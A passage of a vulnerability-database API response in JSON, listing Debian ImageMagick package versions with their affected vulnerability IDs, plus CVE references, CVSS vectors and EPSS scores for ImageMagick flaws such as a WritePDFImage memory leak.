"VCID-urv8-ve9y-e3b4" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v24g-h7t5-nbec" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-v7m7-26bu-wfer" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vbgc-23c4-77hu" }, { "vulnerability": "VCID-vd3a-e897-8bfn" }, { "vulnerability": "VCID-vdum-127b-qfbq" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vp4y-qhc4-nuat" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-vzru-smr4-5kfk" }, { "vulnerability": "VCID-w44j-ecnr-mkhv" }, { "vulnerability": "VCID-w5bd-tn21-fqh7" }, { "vulnerability": "VCID-w8d2-r2ct-m7gv" }, { "vulnerability": "VCID-wbx1-wdxc-k3bc" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-wwxb-6psb-xybx" }, { "vulnerability": "VCID-x3wb-64kk-gues" }, { "vulnerability": "VCID-x65n-6vuk-4ufk" }, { "vulnerability": "VCID-x6sg-6k7v-9qd8" }, { "vulnerability": "VCID-x7us-26aq-3yf8" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xaef-x656-fqfq" }, { "vulnerability": "VCID-xgu5-jypk-h3bd" }, { "vulnerability": "VCID-xgzr-fhu9-myed" }, { "vulnerability": "VCID-xk7c-7f1m-sqe5" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xp3x-q8w4-myhb" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-xtq9-fvcv-kfat" }, { "vulnerability": "VCID-xy5b-m3h2-hbfj" }, { "vulnerability": "VCID-y2nm-f9vb-d7ez" }, { "vulnerability": "VCID-y2pd-cxmz-6yfp" }, { "vulnerability": "VCID-y3xr-bv9y-mqb5" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-ydbk-11w9-wyen" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yqzg-rzp1-bbgm" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-yxwd-j8uj-tudx" }, { "vulnerability": "VCID-z7e5-pt2s-x3a5" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zfw4-5zqw-huh7" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zjgp-g783-d3hy" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zrkc-cfnt-r7hr" }, { "vulnerability": "VCID-zrtt-8nnj-v3ch" }, { "vulnerability": "VCID-zs46-dubn-wfga" }, { "vulnerability": "VCID-zszf-nytw-jqgx" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" }, { "vulnerability": "VCID-zyg9-ad7g-ayex" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.7.4%252Bdfsg-11%252Bdeb9u8" }, { "url": "http://public2.vulnerablecode.io/api/packages/1037804?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.10.23%2Bdfsg-2.1%2Bdeb10u1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-12rd-dhh3-h3ea" }, { "vulnerability": "VCID-152y-9pjj-p7b7" }, { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-18rv-b2mg-jbex" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2dgn-j4dn-9fcd" }, { "vulnerability": "VCID-2dwv-ndt5-gfg2" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2m38-vt4m-5ffa" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-3bbh-2exn-m7ac" }, { "vulnerability": "VCID-3qad-mewf-8khz" }, { "vulnerability": "VCID-3zbe-p6ue-ffe8" }, { "vulnerability": "VCID-41xr-8ryd-z3ew" }, { "vulnerability": "VCID-453d-2nac-jbdc" }, { "vulnerability": "VCID-46ey-s7sy-9qby" }, { "vulnerability": "VCID-4az8-8361-7bg2" }, { "vulnerability": "VCID-4f97-2smu-6qfc" }, { "vulnerability": "VCID-4s25-p8ea-zkh7" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-56xz-svu7-eue2" }, { "vulnerability": "VCID-5a4x-wwha-pufn" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-6279-tc7g-g3ag" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-68kj-s42g-effd" }, { "vulnerability": "VCID-6bf2-uh5z-kfg7" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6vvv-g1fm-4bdn" }, { "vulnerability": "VCID-6y99-sgwe-tygw" }, { "vulnerability": "VCID-6zuv-uh18-k3c1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gya-qyjx-qqfx" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-7yur-twpa-n3e1" }, { "vulnerability": "VCID-834e-c7gn-afac" }, { "vulnerability": "VCID-8yfc-gunh-17a2" }, { "vulnerability": "VCID-92es-dtbz-tqae" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-9h1k-h8gw-hkat" }, { "vulnerability": "VCID-acgu-hc83-yubn" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-aej5-sgf8-7uhp" }, { "vulnerability": "VCID-agz5-g8mr-e7hn" }, { "vulnerability": "VCID-anh4-1hmn-yfh8" }, { "vulnerability": "VCID-aqs4-r36j-ffe7" }, { "vulnerability": "VCID-ay8n-59tt-k7cp" }, { "vulnerability": "VCID-b32k-mwuv-hfeq" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-b8hx-6u4j-b3dc" }, { "vulnerability": "VCID-bcy4-phg3-w3fq" }, { "vulnerability": "VCID-bky2-hjpj-67ag" }, { "vulnerability": "VCID-c8rr-y6zy-h7h5" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-ccbh-689z-6kg2" }, { "vulnerability": "VCID-cmym-m1da-f3fg" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-cure-qgzj-8qfu" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-djqz-f6k5-fqfj" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-ezcj-2yaf-rfhh" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-fzhr-jhhc-m3ej" }, { "vulnerability": "VCID-g1ct-6d28-g3ab" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gc9p-4vdm-rbah" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-gf8v-mmd7-hqag" }, { "vulnerability": "VCID-gp36-v664-vuh2" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-h7em-v8x6-63e3" }, { "vulnerability": "VCID-hrrw-ufje-akg5" }, { "vulnerability": "VCID-hwcd-dj3f-guay" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jpxf-qevp-kycp" }, { "vulnerability": "VCID-jqv2-v42r-7ybf" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-kfb4-xnqr-cya6" }, { "vulnerability": "VCID-mhbe-8x14-f3d6" }, { "vulnerability": "VCID-mmw7-4m3z-2kcn" }, { "vulnerability": "VCID-mn5y-2hmf-dkgy" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-my2x-tnvf-wqbw" }, { "vulnerability": "VCID-n22y-f9az-fubm" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-neaa-39c7-sfbc" }, { "vulnerability": "VCID-nvea-drm5-h3au" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-nxfx-jh82-vud3" }, { "vulnerability": "VCID-p3vh-b6jn-f3e2" }, { "vulnerability": "VCID-p4yb-mqca-v7c8" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-p6m5-ntbm-auct" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-pj8s-qad1-6qdu" }, { "vulnerability": "VCID-pjm4-2g47-4qau" }, { "vulnerability": "VCID-pk4j-w1q9-vqd2" }, { "vulnerability": "VCID-pmpn-drv8-9ude" }, { "vulnerability": "VCID-psf6-cvdn-h3b1" }, { "vulnerability": "VCID-ptej-pfyn-z3aq" }, { "vulnerability": "VCID-q3v4-jztv-9bbs" }, { "vulnerability": "VCID-qda9-n7gh-c7c4" }, { "vulnerability": "VCID-qrqm-h5se-1kep" }, { "vulnerability": "VCID-r1uc-e1w7-kyda" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-rqdx-1pdv-a3bu" }, { "vulnerability": "VCID-rqm7-d751-myfa" }, { "vulnerability": "VCID-rrvd-vd81-sfdm" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-rvjq-uks4-x3h3" }, { "vulnerability": "VCID-rzge-64xp-bfej" }, { "vulnerability": "VCID-s7tx-uu27-xqb5" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-snup-2hn7-sue2" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-swqu-wape-83bj" }, { "vulnerability": "VCID-sy2v-5ufy-sfc4" }, { "vulnerability": "VCID-t2pe-etah-1bh3" }, { "vulnerability": "VCID-tc3z-912z-afc8" }, { "vulnerability": "VCID-tm56-q7ka-ukft" }, { "vulnerability": "VCID-tn11-bwg6-m3e3" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-twq8-ntkg-zbfk" }, { "vulnerability": "VCID-u6vb-tewy-fkda" }, { "vulnerability": "VCID-u9gb-ppd4-3fd5" }, { "vulnerability": "VCID-ucfp-qqy4-jqdm" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-uwq6-h2du-dkdn" }, { "vulnerability": "VCID-v2r8-1wgn-1bgs" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vf3u-cgrx-a7d7" }, { "vulnerability": "VCID-vgvf-at1z-8ydr" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-vrqg-4fke-mfay" }, { "vulnerability": "VCID-wpsv-h9q7-pyep" }, { "vulnerability": "VCID-wwcs-2mw8-4bbr" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-x95w-ad3j-n7aj" }, { "vulnerability": "VCID-x998-fhs5-93ht" }, { "vulnerability": "VCID-xnkt-e7mn-e7du" }, { "vulnerability": "VCID-xsue-s6sg-aqff" }, { "vulnerability": "VCID-xtfv-8vvu-qudb" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yhmq-s1jh-17bh" }, { "vulnerability": "VCID-yspe-wj34-juck" }, { "vulnerability": "VCID-ytpg-f9mm-sbev" }, { "vulnerability": "VCID-yub2-x8z7-d3e6" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zdu5-rtg2-pffb" }, { "vulnerability": "VCID-zh44-pz7k-abba" }, { "vulnerability": "VCID-zp6q-98qj-ykh1" }, { "vulnerability": "VCID-zv8w-puzj-23cd" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.10.23%252Bdfsg-2.1%252Bdeb10u1" }, { "url": "http://public2.vulnerablecode.io/api/packages/1026113?format=api", "purl": "pkg:deb/debian/imagemagick@8:6.9.11.60%2Bdfsg-1.3%2Bdeb11u4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-15ny-qqbj-qyfk" }, { "vulnerability": "VCID-1cpn-zvem-v7gt" }, { "vulnerability": "VCID-29r3-kvf4-n3hc" }, { "vulnerability": "VCID-2gw3-qfan-jygd" }, { "vulnerability": "VCID-2zje-ag2v-7kac" }, { "vulnerability": "VCID-381g-7gdr-qydg" }, { "vulnerability": "VCID-441f-z9bp-vbdu" }, { "vulnerability": "VCID-54da-fzyt-4ud2" }, { "vulnerability": "VCID-5s8n-dfjf-ruey" }, { "vulnerability": "VCID-5uyd-bv33-h7g1" }, { "vulnerability": "VCID-5zkt-kcgx-a3e2" }, { "vulnerability": "VCID-62ar-kwbq-nyh3" }, { "vulnerability": "VCID-6h7x-3rue-kucp" }, { "vulnerability": "VCID-6v1d-1wfr-vqd1" }, { "vulnerability": "VCID-784p-34mz-vucz" }, { "vulnerability": "VCID-7gb9-gd78-7bdu" }, { "vulnerability": "VCID-7t1t-1spz-gfee" }, { "vulnerability": "VCID-9ewm-6688-kkar" }, { "vulnerability": "VCID-a2qm-vkc3-qkd5" }, { "vulnerability": "VCID-acsa-1uwk-fqee" }, { "vulnerability": "VCID-b43n-3d1g-u3fe" }, { "vulnerability": "VCID-b5pd-kk97-gban" }, { "vulnerability": "VCID-cbqr-aybx-d3e6" }, { "vulnerability": "VCID-cuhw-ew1g-s3h2" }, { "vulnerability": "VCID-d8yf-8rff-3yhf" }, { "vulnerability": "VCID-dtza-65ku-aber" }, { "vulnerability": "VCID-e3ne-1hd5-dyfg" }, { "vulnerability": "VCID-eb4u-x1mt-2uan" }, { "vulnerability": "VCID-eeju-vhdm-aqbe" }, { "vulnerability": "VCID-ef36-52cx-dfg5" }, { "vulnerability": "VCID-egwu-28fp-dye6" }, { "vulnerability": "VCID-emmr-15qp-vfah" }, { "vulnerability": "VCID-f1zu-xb4j-8qhp" }, { "vulnerability": "VCID-f6pf-5jnz-fkd1" }, { "vulnerability": "VCID-fnck-7mvx-hqc9" }, { "vulnerability": "VCID-g41y-dv8u-3yf1" }, { "vulnerability": "VCID-g679-q851-xub7" }, { "vulnerability": "VCID-g9xf-han8-6qgs" }, { "vulnerability": "VCID-gdg8-aejn-83c4" }, { "vulnerability": "VCID-h221-qd8d-tqa5" }, { "vulnerability": "VCID-j6tc-f4fc-mbcv" }, { "vulnerability": "VCID-jc5m-7rvc-2qg6" }, { "vulnerability": "VCID-jcjk-s89c-mbbm" }, { "vulnerability": "VCID-jtkv-nvan-jbag" }, { "vulnerability": "VCID-jvq6-xjbu-fkb9" }, { "vulnerability": "VCID-kefv-kpkk-wudf" }, { "vulnerability": "VCID-mxg1-261s-nbds" }, { "vulnerability": "VCID-n47w-r932-abey" }, { "vulnerability": "VCID-nvp5-dpj6-byda" }, { "vulnerability": "VCID-p5aw-n691-nkff" }, { "vulnerability": "VCID-pcme-bwan-3bcf" }, { "vulnerability": "VCID-qjxn-gm96-7ygc" }, { "vulnerability": "VCID-r3vw-ncns-cqgb" }, { "vulnerability": "VCID-r889-wzc7-1yem" }, { "vulnerability": "VCID-rbdg-vz8x-ykah" }, { "vulnerability": "VCID-rjkf-pdny-2fhn" }, { "vulnerability": "VCID-ruf5-255v-sfdb" }, { "vulnerability": "VCID-sd54-b8z1-2fg7" }, { "vulnerability": "VCID-sdc2-fcap-abaz" }, { "vulnerability": "VCID-spch-fffg-4yc5" }, { "vulnerability": "VCID-sw7g-hxxr-n3e1" }, { "vulnerability": "VCID-tt6z-t31v-dkdd" }, { "vulnerability": "VCID-tv15-dcnu-pbbn" }, { "vulnerability": "VCID-utfe-h3b7-jqcj" }, { "vulnerability": "VCID-uvkp-1zss-57gr" }, { "vulnerability": "VCID-uwj5-1fkf-7qg9" }, { "vulnerability": "VCID-vaks-d4k5-zue7" }, { "vulnerability": "VCID-vpdn-g1k9-1kdn" }, { "vulnerability": "VCID-w9zg-tsbg-afa1" }, { "vulnerability": "VCID-x8c1-btup-4ygu" }, { "vulnerability": "VCID-x8c6-9pse-xkc8" }, { "vulnerability": "VCID-y4hn-6bv6-jugw" }, { "vulnerability": "VCID-y58b-be93-hbfd" }, { "vulnerability": "VCID-yx7r-r7ez-7uhp" }, { "vulnerability": "VCID-z9t9-bxf9-hkfk" }, { "vulnerability": "VCID-zab9-9tqj-hbhg" }, { "vulnerability": "VCID-zvq4-ybph-buga" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:deb/debian/imagemagick@8:6.9.11.60%252Bdfsg-1.3%252Bdeb11u4" } ], "aliases": [ "CVE-2019-19948" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.3", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-3bbh-2exn-m7ac" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/82838?format=api", "vulnerability_id": "VCID-3qad-mewf-8khz", "summary": "ImageMagick: Memory leak in the WritePDFImage function in coders/pdf.c", "references": [ { "reference_url": "http://hg.graphicsmagick.org/hg/GraphicsMagick/rev/11ad3aeb8ab1", "reference_id": "", "reference_type": "", "scores": [], "url": "http://hg.graphicsmagick.org/hg/GraphicsMagick/rev/11ad3aeb8ab1" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-04/msg00034.html" }, { "reference_url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html", "reference_id": "", "reference_type": "", "scores": [], "url": "http://lists.opensuse.org/opensuse-security-announce/2019-05/msg00006.html" }, { "reference_url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-7397.json", "reference_id": "", "reference_type": "", "scores": [ { "value": "3.3", "scoring_system": "cvssv3", "scoring_elements": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L" } ], "url": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2019-7397.json" }, { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2019-7397", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00282", "scoring_system": "epss", "scoring_elements": "0.51521", "published_at": "2026-04-01T12:55:00Z" }, { "value": "0.00282", "scoring_system": "epss", "scoring_elements": "0.51599", "published_at": "2026-04-24T12:55:00Z" }, { "value": "0.00282", "scoring_system": "epss", "scoring_elements": "0.51662", "published_at": "2026-04-16T12:55:00Z" }, { "value": "0.00282", "scoring_system": "epss", "scoring_elements": "0.51669", "published_at": "2026-04-18T12:55:00Z" }, { "value": "0.00282", "scoring_system": "epss", "scoring_elements": "0.51649", "published_at": "2026-04-21T12:55:00Z" }, { "value": "0.00282", "scoring_system": "epss", "scoring_elements": "0.51572", "published_at": "2026-04-02T12:55:00Z" }, { "value": "0.00282", "scoring_system": "epss", "scoring_elements": "0.51598", "published_at": "2026-04-04T12:55:00Z" }, { "value": "0.00282", "scoring_system": "epss", "scoring_elements": "0.51559", "published_at": "2026-04-07T12:55:00Z" }, { "value": "0.00282", "scoring_system": "epss", "scoring_elements": "0.51613", "published_at": "2026-04-08T12:55:00Z" }, { "value": "0.00282", "scoring_system": "epss", "scoring_elements": "0.51609", "published_at": "2026-04-09T12:55:00Z" }, { "value": "0.00282", "scoring_system": "epss", "scoring_elements": "0.51658", "published_at": "2026-04-11T12:55:00Z" }, { "value": "0.00282", "scoring_system": "epss", "scoring_elements": "0.51637", "published_at": "2026-04-12T12:55:00Z" }, { "value": "0.00282", "scoring_system": "epss", "scoring_elements": "0.5162", "published_at": "2026-04-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2019-7397" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-10649" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11470" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11472" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11597" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11598" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12974" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12975" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12976" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12977" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12978" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12979" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13135" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13137" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13295" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13297" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13300" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13301" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13304" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13305" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13306" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13307" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13308" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13309" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13311" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13391" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13454" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-14981" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15139" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-15140" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16708" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16710" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711", "reference_id": "", "reference_type": "", "scores": [], "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16711" }, { "reference_url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16712", "reference_id": "", "reference_type": "", "scores": [], "url": 